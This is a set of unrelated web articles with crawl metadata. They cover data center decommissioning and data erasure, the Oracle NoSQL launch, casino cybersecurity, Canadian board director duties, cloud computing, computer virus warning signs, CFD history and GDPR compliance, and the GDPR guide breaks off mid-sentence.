Summary: This article explores the process of data center decommissioning and cites the importance of software-based data erasure during this process. It enlists the various ways in which overwriting data can help an organization ensure data security and prevent data breaches during data center decommissioning. A data center is a facility where organizational computing systems, servers, and associated components, such as network and storage devices are located. Data center decommissioning is the practice of dismantling computing systems and hardware for disposal, recycling, relocation, or reuse as the data is transferred to the upgraded servers. Decommissioning a data center is as difficult as installing one and given the sensitive nature of organizational data, the decommissioning process requires thorough planning and careful execution. While retiring IT Assets in a data center, follow a quick data center decommissioning checklist of items as listed below: Data Center Decommissioning Checklist: - Prepare Scope of Work - Document a list of devices to be dismantled: computers, servers, hard drives, cables, and other data center equipment. - Identify and asset tag devices that need to be recycled, or re-used. - Take Backups and ensure Software Licenses for servers are in place - Ensure all necessary data and power backup systems are in place. - Locate and Keep all software licenses for servers handy. - Planning for Decommissioning - Create an Implementation plan defining the roles of the person responsible for the decommissioning process and activities to be performed at different time intervals. - List down vendors that you may need to support the process of dismantling. - Cancel all maintenance contracts for servers, if any. - Arrange necessary tools for decommissioning including forklifts, tip guards, hoists, data erasure tools, degaussers, etc. - Dismantling and Data Sanitization - Dismantle the servers. Choose the right destruction method – erase, degauss, or shred depending upon the reuse requirement. - For data sanitization, connect the storage media to permanently wipe redundant data with professional data erasure tools. Role of Data Erasure in Data Center Decommissioning Retiring of Data Center is not just about dismantling and removing the IT hardware. It is also about maintaining data security at all levels. The absence of Data protection during the removal process of redundant hardware may lead to hackers gaining access to data at rest and misusing sensitive information causing data breaches. It is thus imperative to completely sanitize and destruct data during the decommissioning process. Morgan Stanley data breach is a classic example of how ignoring due diligence in data center decommissioning can lead to a data breach and subsequent penalties worth millions of dollars. Also, outdated systems and equipment do not come with the latest features and security updates. Thus, IT assets at the end-of-life possessing sensitive data can be breached if proper care is not taken to dispose of them. This may ultimately lead to data breach lawsuits and the loss of the company’s reputation. Secure data erasure during data center decommissioning can be helpful in more than one way. - Facilitates On-site Data Destruction During decommissioning process, data erasure helps in wiping unwanted data from drives and servers at the company’s own facility either through a vendor or by the company itself. The advantage of on-site data destruction is that data and devices exchange very few hands and the process can be witnessed by the concerned at the company’s facility. When you plan to opt for secure data erasure, ensure your data erasure tool or your service provider complies with prominent standards like NIST 800-88 (National Institute for Standards and Technology) and DoD 5220.22-M (U.S. Department of Defense). - Ensures Efficiency & Security Ensuring data security throughout the data lifecycle is critical and software-based data erasure ensures secure and permanent wiping of all your sensitive data beyond retrieval even in a laboratory setting. You can achieve media sanitization across all your data center IT Assets with data erasure, whether it is your redundant hard drives, solid-state drives, servers, virtual machines, or logical storage area networks. Software-based data erasure produces a 100% tamper-proof report for every erasure performed to ensure that wiping was successfully done. - Helps in Meeting Compliance Organizations are obligated by laws like EU-GDPR, CCPA, SOX, HIPAA, etc. to include data destruction as a part of their IT Asset management policy. Modern data protection laws demand secure data destruction that leaves no traces behind. The use of a certified and professional data erasure tool like BitRaser is recommended as it helps in ensuring compliance with global data protection legislation by destroying information securely and generating auditable reports. In case the third-party vendor is involved in decommissioning, organizations should demand the use of certified and reliable data sanitization tools. - Offers Documented Evidence of Wiping (Audit Trails) Software-based erasure produces a certificate of destruction for every instance of wiping. It acts as an audit trail for the complete data erasure process. The Certificate helps an organization prove that it has securely destroyed the data. It also promotes trust towards the third-party vendor performing media sanitization during data center decommissioning on behalf of your organization. When data is securely wiped, it eliminates all possibilities of data getting compromised or breached. - Encourages Responsible Recycling Data erasure or overwriting is an eco-friendly approach toward media sanitization as it ensures that the storage device is available to be reused, repurposed, or recycled. A professional wiping tool thus is a sustainable approach toward decommissioning IT assets in a data center as it reduces e-waste. Unlike physical destruction for device disposal, data sanitization is an eco-friendly approach to erasing every trace of information from the device and allows further reuse and recycling of the device. Data Erasure: Integral Part of Data Center Commissioning Services Data erasure forms an integral part of data center decommissioning services as it deals with the most important element of a data center i.e. its sensitive data. The absence of the right data destruction policy and any ignorance in ensuring due diligence in the disposal of sensitive information may lead to data leakage and breach. This can not only cost huge penalties and loss of reputation to the organization but also hampers business-critical work and loss of customer trust. It is thus pivotal for every organization to ensure that it either deploys a professional and certified data erasure tool or hires a third-party vendor that uses certified software and generates a certificate for every wiping executed.
<urn:uuid:6b59917e-d7f6-47ff-ae59-3918ec53b483>
CC-MAIN-2024-38
https://www.bitraser.com/article/secure-data-erasure-for-data-center-decommissioning.php
2024-09-15T03:52:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00396.warc.gz
en
0.91488
1,394
2.84375
3
The Oracle NoSQL Database can now be downloaded from the Oracle Technology Network. The software will also be a key component the Oracle Big Data Appliance, due to be shipped in the first three months of 2012. Based on the Berkeley DB database, it would be of interest to “customers who are acquiring massive amounts of data who are unsure about the schema, who want more fluid capture of the data,” said Marie-Anne Neimat, vice-president of database development at Oracle. The company is responding to the growing number of databases introduced in the past few years that eschew the typical SQL architecture in order to scale up and speed performance. Such a database may be useful for storing information such as data from service logs, sensors and meters as well as from social networks and personal information for e-commerce sites, the company claimed. A database of this sort would also be a good fit for large organizations that are already using Oracle databases, noted analyst Curt Monash of Monash Research. In many cases a relational database is not the best choice for tasks such as tracking Web interactions. “NoSQL in general deserves a place in Oracle shops, so it makes sense for Oracle [Nasdaq: ORCL] to try to co-opt it,” he wrote in a blog posting. The database is based the Java version of Berkeley DB, an open source database developed by the University of California Berkeley that is widely used in embedded systems. The database uses a simple key-value data model, meaning that a program can fetch the needed piece of data by providing the appropriate key, or a numeric identifier. Although it does not offer the ability to do nuanced, highly structured queries in the same way a SQL relational database would, the database doesn’t require a fixed underlying schema, so organizations can add new columns as new types of information need to be captured, Neimat said. The software allows administrators to vary the speed of responsiveness against the time needed to reach consistency, or the state when a piece of data is completely stored. “When an update is issued, it can be applied to a single node or the majority of nodes, or to all of them. That makes it easy for the user to manage consistency,” Neimat said. The database will be able to scale at a near linear rate, meaning capacity can be increased in a uniform rate as more servers are added to the cluster. Oracle itself has built a 300 node cluster with this database, though, theoretically, there is no limit to the size of the cluster that could be built, Neimat said. Keeping track of the location of all the data falls to a client library, which can be linked to by an application. The Java-based library routes requests to the node holding the a copy of the data. Programmers have their applications interact with the database through a Java API (application programming interface). Primary keys themselves can have sub-keys, which point to different fields within the same record. Subkeys can be advantageous in that they could be used to add more data fields to existing records. “You can have flexibility in which attributes to have with which records. You’re not sure what you want to do with the data, but you do know you want to keep it and analyze it later,” Neimat said. “All the records that share the same root key are all on the same partition, all on the same node,” Neimat said. “You can update multiple records, insert, retrieve, delete multiple records using the primary key.” Administrators can interact with the database through a Web console, which offers the ability to manage and monitor topology, as well as to set up load balancing across multiple nodes. The company will offer a free community version of the database, as well as a commercial version that will eventually be augmented with additional features. The company is promising that the installation will be polished to the degree that one would expect from Oracle, and that the company will offer full support for the paid editions.
<urn:uuid:dd6e242a-74e4-4c2b-8537-4595772e5861>
CC-MAIN-2024-38
https://www.itworldcanada.com/article/oracle-launches-nosql-database/44932
2024-09-15T03:04:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00396.warc.gz
en
0.954113
837
2.515625
3
Cybersecurity in casinos involves more than just protecting customer data, casinos face various threats, including fraud, hacking, and data breaches. To stay ahead of cybercriminals, casinos invest heavily in advanced security measures and continually update their strategies to protect their assets and customers. Advanced Security Technologies Casinos, including the leading online gambling sites in Canada, employ a range of cutting-edge technologies to safeguard their operations. Some of these include: - Encryption: Encryption is a fundamental security measure that ensures sensitive data is unreadable to unauthorized individuals. Casinos use strong encryption protocols to protect financial transactions, personal data, and communication channels. - Firewalls and Intrusion Detection Systems (IDS): Firewalls and IDS are essential for monitoring and blocking suspicious activities. They act as barriers between internal networks and external threats, ensuring that any unauthorized access attempts are identified and mitigated promptly. - Multi-Factor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide two or more verification factors. This makes it significantly more difficult for cybercriminals to gain unauthorized access to systems and accounts. - Biometric Security: Biometric technologies such as fingerprint scanners, facial recognition, and iris scanners are increasingly used in casinos. These technologies provide a higher level of security compared to traditional password-based systems. - Artificial Intelligence (AI) and Machine Learning (ML): AI and ML are utilized to detect and respond to threats in real-time. These technologies can analyze vast amounts of data to identify patterns and anomalies that may indicate a cyber threat. Employee Training and Awareness In addition to technological solutions, casinos place a strong emphasis on employee training and awareness. Employees are often the first line of defense against cyber threats, and their actions can significantly impact the overall security of the organization. Key aspects of this training include: - Phishing Awareness: Employees are trained to recognize and avoid phishing attempts. This includes understanding the signs of suspicious emails and knowing how to report potential phishing attacks. - Password Security: Strong password policies are enforced, and employees are educated on the importance of using complex, unique passwords for different accounts. Regular password updates are also mandated. - Data Handling Procedures: Proper data handling procedures are crucial in preventing unauthorized access and data breaches. Employees are trained on how to securely handle, store, and dispose of sensitive information. - Incident Response Protocols: Employees are trained on the proper protocols to follow in the event of an incident. This includes knowing how to report incidents, who to contact, and what steps to take to mitigate damage. - Regular Security Drills: Regular security drills and simulations are conducted to keep employees prepared for potential cyber threats. These drills help ensure that staff members are familiar with procedures and can respond quickly and effectively in the event of an attack. Continuous Improvement and Collaboration Casinos understand that cybersecurity is an ongoing process that requires continuous improvement and collaboration. They frequently update their security measures to address new and emerging threats. Collaboration with industry peers, government agencies, and experts is also essential to staying ahead of cybercriminals. Through participation in information-sharing networks and industry forums, casinos can exchange knowledge and best practices. This collaborative approach helps them stay informed about the latest threats and advancements in cybersecurity technology. Moreover, regular audits and assessments are conducted to identify vulnerabilities and areas for improvement. By staying proactive and vigilant, casinos can ensure they remain one step ahead in the constantly evolving landscape of cybersecurity. In conclusion, the gaming industry must continually evolve its security measures. Casinos employ advanced technologies and emphasize employee training to protect their assets and customers, ensuring a safe and secure gaming environment.
<urn:uuid:4ffacb75-4823-44a7-852c-66eb6079ce13>
CC-MAIN-2024-38
https://www.cyberdb.co/cybersecurity-in-the-gaming-industry-how-casinos-stay-one-step-ahead/
2024-09-16T10:11:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651682.69/warc/CC-MAIN-20240916080220-20240916110220-00296.warc.gz
en
0.936969
749
2.578125
3
The roles and responsibilities of a board of directors in Canada Canadian corporations are primarily ruled by the Canada Business Corporations Act. Laws for corporations in Canada are similar to many other corporate laws in the United States and other parts of the world, particularly as they pertain to fiduciary duties and conflicts of interest. Canadian board directors are responsible for knowing their duties and responsibilities. Board directors who fail to comply with national and local statutes may be held liable for their actions in court. The two primary duties in Canada are fiduciary duties and the Duty of Care. Canadian Board Directors and Their Fiduciary Duties Above all, Canadian board directors must maintain a preeminent view toward the corporation's interests. With regard to every decision and duty, board directors must act honestly and in good faith, always placing the interests of the corporation ahead of their own. Board directors may not disclose confidential information about the corporation. Directors who acquire significant business information from others have a duty to share it with the rest of the board. This directive also holds true regarding calling the board's attention to opportunities in which they may be interested. Similar to other global corporate laws, Canadian board directors aren't allowed to pursue business opportunities for their own benefit that they should be pursuing on behalf of the corporation. Canadian courts are clear on their expectations for board directors and hold them strictly accountable for their actions and their failure to act. Canadian Board Directors and the Duty of Care Duty of Care is a board director duty that is internationally accepted and respected. Duty of Care requires board directors to exercise the same care, diligence and skill that a reasonably prudent person would exercise in comparable circumstances. Duty of Care requires board directors to take appropriate steps so that they can make sound, informed decisions. This duty requires them to make sure that they leave no stone unturned in gathering all available information and to assess that information critically before making decisions or recommending decisions to the board. Canadian corporate law assumes that board directors will seek input from the recommendations of management and other corporate advisors and will test that information. Canadian regulatory authorities require all board directors to abide by the Duty of Care. Board directors with special skills or experience may be expected to apply their skills when making decisions that affect the corporation and may be held to a slightly higher standard under certain situations. Canadian Board Directors and the Duty to Manage In addition to fiduciary duties and the Duty of Care, the Canada Business Corporations Act outlines board directors' Duty to Manage. This statute outlines the duties that board directors must accept, as well as matters that they must refrain from participating in. The law specifically states: "Subject to any unanimous shareholder agreement, the directors shall manage, or supervise the management of, the business and affairs of a corporation.'" Canadian corporate law requires board directors to provide annual statements to the shareholders. They must also abide by all statutes for corporations, including laws for employment, tax and other matters. Canadian board directors should also be advised about matters that are solely their responsibility. Canadian law doesn't allow them to delegate certain matters. In specific terms, board directors may not delegate the following responsibilities: - Submission of questions to shareholder votes - Authorization of an issuance of securities - Declaration of dividends - Approval of financial statements, management proxy circulars, takeover bid circulars and financial statements - Adoption, amendment or repeal of corporate bylaws Canadian Board Directors Must Avoid Conflicts of Interest In the past, Canadian law prohibited board directors from having any kind of a conflict of interest. The laws have changed to allow for conflicts of interest as long as board directors disclose the conflict and abstain from discussions and votes on matters where there is a personal or professional conflict. Failure to Comply With Legal Duties Subjects Board Directors to Personal Liability Canadian corporate laws and case laws state that board directors may be held personally liable for their actions of poor decision-making as well as for their unwillingness to act in circumstances where they needed to act. This is because a breach of fiduciary and statutory duties is illegal. A board of directors may not allow the corporation to act outside of its authority, which is another matter for which board directors may be held liable. Courts will hold board directors liable for infractions that they commit as individual directors as well as those they make on behalf of the corporation. In addition, Canadian courts will hold board directors personally liable for failing to perform other duties, such as: - When the corporation fails to act - When board directors fail to fulfill their responsibilities - When board directors fail to provide proper oversight over the corporation Directors and Officers Insurance Provides Limited Indemnification for Canadian Board Directors Most Canadian corporations purchase Directors and Officers insurance policies to protect board directors from liabilities that they may face during the course of their duties as board directors. Board directors should be aware that Directors and Officers policies carry limits and exclusions. Insurance policies have upward limits. Board directors need to be sure that they review Directors and Officers policies to make sure that the limits are high enough to protect them. Directors and Officers policies also contain exclusions for circumstances where board directors fail to act consistently with their fiduciary duties. In the event of a claim, insurance companies must ensure that board directors acted in lawful ways. Canadian corporations often include director indemnity provisions in their bylaws. Basic Responsibilities of Canadian Board Directors Are Part of Good Corporate Governance Canadian laws are quite similar to the laws for corporations in the United States and many other parts of the world. The laws are clear and form the basis for good corporate governance. Essentially, board directors need to be vigilant about performing their fiduciary duties and Duty of Care. They need to be aware that these duties apply to their actions, as well as their failure to act. Finally, Canadian board directors need to have a good understanding of the liabilities that accompany board directorship and compare them with the coverage, limitations and exclusions that are inherent within D&O insurance policies.
<urn:uuid:c1cb8a2c-f6dd-4d5e-a4b4-a668bddbbb1c>
CC-MAIN-2024-38
https://www.diligent.com/resources/blog/the-roles-and-responsibilities-of-a-board-of-directors-in-canada
2024-09-18T22:06:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00096.warc.gz
en
0.962713
1,230
2.625
3
The cloud has been an IT buzzword for a long time now, but a lot of people still don’t fully understand what the cloud is, or how it can be used to help their company. Official Definition- If you Google “cloud computing” you’ll get the following definition, “the practice of using a network of remote servers hosted on the Internet to store, manage, and process data, rather than a local server or a personal computer.” Still not totally clear? It’s okay, most people are still confused by this definition. Here’s a better way of explaining cloud computing – This term refers to using a computer hosted on another server to run applications and store data. This data is still readily available and can be easily accessed, but it won’t be stored locally on your computer. How It Works- When you use cloud computing you’ll pay a service provider a monthly fee based on the size of the data you’re using. In most cases, you can pay for only the data and power you use, just like paying your utility bill. This gives customers flexibility and will save money. What’s in the Cloud- You can find almost any software application you need inside the cloud, because the cloud is just a computer located somewhere else. So, if an application will run on your local machine, it will most likely run on the cloud. This allows you to customize the cloud to your preference in order to meet your specific needs. The Bottom Line – Since the majority of the computing will happen offsite, using the cloud can save money by reducing breakdowns and the need for maintenance. Your local computers will also be able to run much more efficiently because they won’t be bogged down with data and large applications.
<urn:uuid:1ba3d6f2-e125-41ff-aa6e-26d960980fcd>
CC-MAIN-2024-38
https://www.jdyoung.com/resource-center/posts/view/44/crash-course-in-cloud
2024-09-18T21:01:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00096.warc.gz
en
0.924137
369
3.15625
3
With an expected 20.8 billion connected things to be in existence by 2020 these devices are producing data at an astonishing rate here in the UK. The Internet of Things (IoT) is having an increasing impact upon our ever-evolving lives. However, what many take for granted is the fact that algorithms are at the heart of the devices generating this data. Algorithms are essential to the running of everyday products, from the brakes in your car to trades on the stock exchange, creating our economy’s secret weapon of success and mass destruction in equal measure if risks aren’t mitigated for. Behind the invisible cogs lies hidden value. In the wise words of Peter Sondergaard, Senior VP of Gartner: “Data is inherently dumb – algorithms are where the real value lies. Algorithms define action”. Knowledge is power, and algorithmic data analytics unlocks that power, meaning businesses are able to maximise on data driven decision management. In turn, they can keep ahead within a competitive landscape, where an ill-informed decision could be costly to both reputation and profitability. In order to ensure the worst doesn’t happen, businesses must have experts in place who can analyse and manipulate the right algorithms to produce the most beneficial actionable data, to unlock its future success. Once a high level of understanding is gained, businesses can capitalise even further by sharing algorithm assets through open sourcing these across the market place. Many company’s may be reluctant to share such assets, but sharing can be useful as this will co-dependently enable you to benefit from feedback and improve your original algorithmic assets as a whole. An important area we must address is the fact that with the booming algorithmic economy that has been created around IoT, there also comes an increased risk of cyber attacks. Individuals with malicious attempts could tamper algorithms and essentially bring a business to its knees. Ensuring security is considered as a crucial factor when developing algorithms is imperative to preventing such situations. The complexities of today’s threats means it is no longer viable to simply add on a security layer at the end and rely on testing just before the project goes live – this is too little, too late. Given the importance of security in today’s interconnected IT landscape, most software development lifecycle models require security checks to be present at all stages. This ensures security is baked-in from the beginning, but we also need to recognise that security is not a static attribute of quality and once software is released its security must be continuously reviewed to ensure that it is not affected by newly discovered vulnerabilities. By doing so businesses can unlock the true benefits of the increasingly algorithmic economy, whilst mitigating the risks. The opinions expressed in this article belongs to the individual contributors and do not necessarily reflect the views of Information Security Buzz.
<urn:uuid:24b4bc44-79fa-49e3-a655-60112c761005>
CC-MAIN-2024-38
https://informationsecuritybuzz.com/algo-economy-secret-weapon-successful-business/
2024-09-19T23:58:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00896.warc.gz
en
0.947357
578
2.5625
3
How Do I Know if I Have a Computer Virus? [+Video] Did you know there are millions of computer viruses? There can be one inside your laptop now, waiting to be activated. How do you know it’s there? What can you do to remove it? For over 20 years, Intelligent Technical Solutions (ITS) has been helping companies of all sizes protect their business from viruses by providing updates on new risks and recommending appropriate solutions. Common Signs of Computer Viruses A computer virus is a packet of malicious software, or malware, designed for 3 reasons: to make money, to steal virtual goods (such as those related to online gaming), or simply to cause trouble. Just like the flu virus or the coronavirus, a computer virus is highly contagious because the code replicates itself and spreads throughout your operating system as well as other computers on the same network. How can you tell if a virus is there? Check for these most common signs: Booting up or opening programs takes longer than usual. Many pop-up windows appear, typically prompting you to click an ad. Unexpected new programs. You see unfamiliar applications when you start your computer or when you check your list of active ones. Frequent system crashes. The computer crashes or shows error messages because a virus has damaged your hard drive. Your hard drive is working overtime by itself and making revving-up noises. Your account autonomously sends emails to all your contacts. Password changes or missing files. You’re locked out of your computer or unable to access certain files. Antivirus programs and firewalls fail. Programs that want to clean out or block the virus become ineffective. What’s the real evidence that you got hit by a virus? When you’ve already lost something – money, or control of your data. What can a computer virus do? A virus attack can directly lead to lost funds. Money can be diverted or rerouted using stolen passwords, or through an authorizing email that was sent from an official email account. Imagine a virus acting like an impostor: it pretends it was you and takes what’s yours. The theft of online identities has grown exponentially because when hackers access personal information through viruses, they can steal from, lie to, or threaten others in your name. They can take over your online games account and steal virtual goods that have a real-life value attached to them. They can even “fence” these stolen virtual goods to other players and convert them to real money. The virus can also act as a highjacker demanding ransom. In a ransomware attack, you lose access to your files or the computer itself, then receive a threatening message demanding that you pay its creators to get your data back. Even if you avoid ransom by recovering the data from a backup server, you’ll spend to restore your computer systems and lose revenue until you’re back in operation. Ever heard of "cryptojacking"? That’s a recent virus category, and it’s both an interesting and growing one. Cryptojacking malware will target your hardware resources – your computer’s processor, memory. and graphics card -- and use those to mine cryptocurrency (more popularly known as bitcoin). Because “mining” bitcoin is a very hardware-intensive process and requires a lot of energy, it’s worthwhile to create malware that allows you to use someone else’s equipment and electricity to get bitcoin into your bitcoin wallet. As cryptocurrencies’ price increases, more and more cryptojacking will happen, increasing the risk that your resources will be targeted. Many viruses, though, don’t do much harm to your computer aside from slowing down processing speed. What’s happening there? The virus is capturing information from your online behavior (think social media spyware) and sending it to people who sell things -- products, advocacies, or political messages. There’s a lot of money to be made from online ads and lots of spyware was created to direct these ads to your computer. That’s how a lot of spam emails and pop-up windows end up with you. How to Prevent Computer Viruses There are many ways computer viruses spread in our highly connected environment, some more obvious than others. It can happen through attachments in email and text messages, downloading files online, even social media sharing. Our mobile phones are highly portable computers and viruses have been created for those, too. Hardware – infected external drives or USBs -- has always been a visible way in. Here's the best rule for avoiding contact with a virus: “If in doubt, don’t”. Avoid clicking pop-up ads. Do not download files from websites you don’t trust. Above all, protect your accounts -- here are 3 commonsense ways: 1. Good, secure passwords. Something easy to remember but hard to guess. Use a phrase with a character in between, and there’s a number in the end. It should be complex and long. 2. Multi-factor authentication. Whether you have an application for it, a number gets sent to your email or mobile phone. Email is still the way most computers are compromised: you open an attachment asking you to enable Macros, and with that, you give the hacker full access to your computer. If you’re in doubt that this email was sent by someone you know, the best thing to do is call that person to confirm before you open it. What should you do in case the antivirus program detects a virus? It will give you an action you can take, usually just by clicking a button. But before you do that, message your IT technician first and show him or her the message to report what’s happening on your computer. If you have outsourced IT management, you’d have someone to tell you what the real problem is and help you understand how to use the antivirus program. Can I get an antivirus program online for free? Yes, you can. We did a quick survey of IT management professionals and these are the ones that got their vote: “They have some of the best detection. They have some very clever ways of putting in files to, you know, watch for an attack. If this file changes, it’s like the canary in the coalmine – you’ll immediately know something’s wrong.” 2. Sophos Security “Their free antivirus programs are very good, especially their mobile one. They do very good analysis after the fact and they have industry integration.” “It’s fallen out of favor because it’s Russian. But unless you were NASA or you had state secrets, it’s still one of the best ones out there.” Should my small business rely on these free antivirus programs? According to IT management professionals, no. The free versions leave a lot of gaps and an IT team would have to add a lot of (paid) software to close them. Statistics show that while everybody was working from home due to the coronavirus, virus infections on home computers spiked -- even more than the decline in malware attacks on office networks. Business computers are more likely to have a good, paid-for antivirus program than home computers and if they’re used to link to the office network, there’s an increased risk of a breach in system security. The expert advice is to pay a little bit of money to find something that works. And depending on the size of the business, it may be a good idea to get cyber-liability insurance, too. In case the antivirus system fails, maybe the insurance can cover 75% of the loss. It’s highly worthwhile. Should I invest in an antivirus program or managed services? Are there data security regulations in your industry? Then it makes even more sense to invest in paid antivirus programs or IT management services. If you’re obligated to protect data confidentiality and you’re compromised, you’re no longer able to guarantee confidentiality and you may have to make a public statement. You’ll have regulatory, reputational, as well as ethical issues, so make sure your customers can continue to trust you with their data. Viruses happen but they’re not an excuse for a breach -- especially now that you know how to identify and to protect yourself against them.
<urn:uuid:f5a67338-8a5d-45b5-8be9-ccc3b9ff0814>
CC-MAIN-2024-38
https://www.itsasap.com/blog/how-do-i-know-if-i-have-a-computer-virus
2024-09-08T00:51:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00196.warc.gz
en
0.942917
1,773
2.84375
3
In this special guest feature from Scientific Computing World, Bill Clark, executive vice president of CD-adapco, considers the successes of computer-aided engineering through the “three ages of CFD.” Computational Fluid Dynamics (CFD) is about solving difficult engineering problems, using expensive software, enormous computing resources, and highly trained engineers. If the problems weren’t difficult, then it is doubtful that anyone would devote so much time and money to solving them. From the perspective of a modern engineer, it would be easy to assume that this desire to apply simulation technology to complex problems is a recent concern; that only today are we able to contemplate solving tough industrial problems, armed with a complex array of multi-physics simulation tools. This is a misconception. Twenty or so years ago, commercial CFD was born from a desire to solve problems involving turbulence, heat transfer, and combustion, based on the vision of a small group of pioneering researchers who were able to see beyond the meagre computing resources available at the time, and to develop the techniques and methods that would ultimately revolutionize engineering. CFD meshes took weeks, or even months, to construct, usually by a process of ‘hand-meshing’ by which an engineer (usually PhD-qualified) painstakingly built up meshes vertex-by-vertex. Although ‘automatic meshing technology’ was starting to become available in the early 90s, it was far from reliable, particularly when it came to defining layers of prismatic cells that were required to accurately capture boundary layers. Another issue with the so-called ‘automatic meshing’ technology of the day, is that it tended to generate more cells than the meagre computing resources of the time could handle. In 1994, I can remember submitting a Star-CD simulation that consisted of 750,000 cells for the first time, and fully expecting smoke to start flowing from the large Unix box that sat under my desk. The timescales required meant that analyzing multiple design variations was impractical. This was the ‘first age’ of CFD. Getting a simulation result at all was difficult. CFD was usually deployed at the end of the design process, as a final verification, or for troubleshooting purposes, when everything else had failed. The arrival of cheap Linux computers reduced parallel licensing costs and the continually improving simulation technology opened up the ‘second age of CFD’, in which CFD engineers could reliably provide simulation results within reasonable timescales. Consequently, engineering simulation began to establish itself as the core part of the design process, occurring earlier and earlier and providing a constant stream of simulation data that could be used to drive design decisions. Increasingly, simulation began to displace experimentation as a way of verifying designs. The problems that we could solve expanded beyond the core CFD disciplines of fluid mechanics and heat transfer, as we began to consider problems that involved ‘fluid-structure interaction’, multiphase flow, and chemical reaction. With a little engineering ingenuity, there were very few problems that engineering simulation couldn’t offer some insight to. Which brings us to today, and the dawn of the ‘third age of CFD’, where lines between CFD and structural mechanics are becoming so blurred that it makes little sense calling it ‘CFD’ at all. An uncomfortable truth about modern engineering is that there really are no easy problems left to solve. In order to meet the demands of industry, it’s no longer good enough to do ‘a bit of CFD’ or ‘some stress analysis’. Complex industrial problems require solutions that span a multitude of physical phenomena, which often can only be solved using simulation techniques that cross several engineering disciplines. What our customers are really asking for is the ability to ‘see the big picture’. Simulating whole systems rather than just individual components, taking account of all of the factors that are likely to influence to performance of their product in its operational life. In short, to simulate the performance of their design in the context that it will actually be used. Whereas previous generations of engineers could take some comfort in the ‘safety net’ of extensive physical testing to rescue them from the occasional poor prediction, CAE is increasingly the victim of its own success as simulation continues to displace hardware testing as industry’s verification method of choice. Although this increased confidence in simulation is well-deserved (and has been hard-earned through many years of successful prediction), it brings with it a great deal of pressure to ‘get the answer right’ every time. An important part of this is ‘automated design exploration’, in which the simulation results automatically drive design improvements, with minimal input from the engineer (other than defining the initial problem and design constraints). With this approach, CFD is used to compile databases of simulation results that explore the complete range of usage scenarios, or it is tied to optimization technology (such as our HEEDS software) to determine the best solution to a given problem automatically. Such are the magnitude of changes in the past two decades of simulation technology that it would be foolish to speculate what might be happening 20 years from now. Whatever those changes are, I hope that SCW will still be around to report them. Sign up for our insideHPC Newsletter.
<urn:uuid:685e8cb5-e9ce-48c5-b713-16ddd35b16f1>
CC-MAIN-2024-38
https://insidehpc.com/2014/09/past-present-future-engineering-simulation/
2024-09-09T05:55:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00096.warc.gz
en
0.964863
1,109
2.890625
3
The General Data Protection Regulation (GDPR) is the world's most important set of rules about personal data protection. Compliance demonstrates to your customers and partners that your organization has followed the law to protect the integrity of personal data. Non-compliance may result in security breaches, steep fines, and a poor brand reputation. Read on to learn the origin of the GDPR, the principles of data processing and data privacy, and how your organization can become compliant. The GDPR Data Protection Act originated in the European Union and is the result of an evolution of general privacy regulations. According to the International Privacy Professionals Association, legislation about personal data protection began ramping up in the 1980s. In 1995, the European Data Protection Directive came into effect and detailed rules for personal data protection and sharing. In 2009, the European Commission started a conference based on new challenges for data privacy, given modern communication methods and technologies like cloud computing. The goal was to reform the 1995 rules eventually. The GDPR officially came into effect in May 2018. While the GDPR originated in the EU, it applies to organizations anywhere as long as they collect or target data related to the people in the EU. This includes the US. The GDPR meaning is to regulate how companies handle and share personal data. A number of organizations were guilty of collecting and sharing their consumer's personal information without their consent. The GDPR gives consumers more agency over how they share their personal data with organizations. Companies must adhere to specific standards when they collect, manage, and store personal data. They also have to inform their customers about their data collection and usage and get their consent. The following summarizes the seven GDPR principles related to processing personal data. Each principle ensures compliance with data privacy and protection. The purpose of GDPR compliance is to ensure data privacy and protection. An organization gains a wealth of benefits if they're GDP compliant. According to TechTarget, being GDPR compliant is a key differentiator for businesses. Compliance can help an organization streamline and improve critical business functions. One major advantage is proving trust and credibility. A GDP-compliant organization demonstrates to its customers and partners that it has followed the legal best practices for data processing, privacy, and protection. This can also boost an organization's brand reputation. Another advantage is that compliance makes data management and business process management easier. If an organization launches data protection initiatives, it may appoint at least one official to be in charge of data use and compliance issues. That person can identify, track, and map how data flows through the organization. Working toward GDPR compliance may cause an organization to take a closer look at their data processing and lifecycle workflows. They can then spot gaps in security and clean up flawed or obsolete information. Following the GDPR requirements can stave off a good deal of monetary and reputational damage as well as legal hassle. An organization faces enormous consequences if they're not compliant. Penalties depend on the severity and circumstances of the organization's violation. The GDPR says non-compliance fines can be as much as 4 percent of the organization's global revenue, or at least $21 million USD. One of the biggest reported GDPR violations of 2023 was committed by Meta. The Irish Data Protection Commission has fined Meta 1.2 billion euros for transferring personal data from European to US users without proper data protection. Following the requisite protocol for managing personal data can stave off huge penalties. While the GDPR originated in the European Union, its scope is extra-territorial, meaning It also applies to countries outside the EU. Here are guidelines specifically for US companies: First, you must confirm that your organization needs to comply with the GDPR. Determine what personal data you process and if any of it is from people in the EU. If you do, determine if the processing activities relate to offering goods or services to the data subject, whether they pay for them or not. Check Recital 23 to clarify if your activities apply to GDPR. Odds are good that they do. If they do, continue to the next steps. Consent is one of the most important legal justifications for your processing other people's data. The GDPR defines specific conditions for consent in order to process personal data lawfully. A few of the requirements include: There are also conditions for consenting itself. Some of them are that when a duty requires processing personal data, the controller must demonstrate that the subject has given consent. View GDPRs Article 6 for more details. The GDPR has a Data Protection Impact Assessment template to use when you plan your project. Implement data security initiatives like end-to-end encryption to reduce the chances of a data breach. You'll be accountable if your third-party vendors violate GDPR requirements. These include email vendors, cloud storage providers, and any other subcontractors that may process personal data. The GDPR details some of the qualifications the management-level officer must have. This means a data hack or any other exposure of 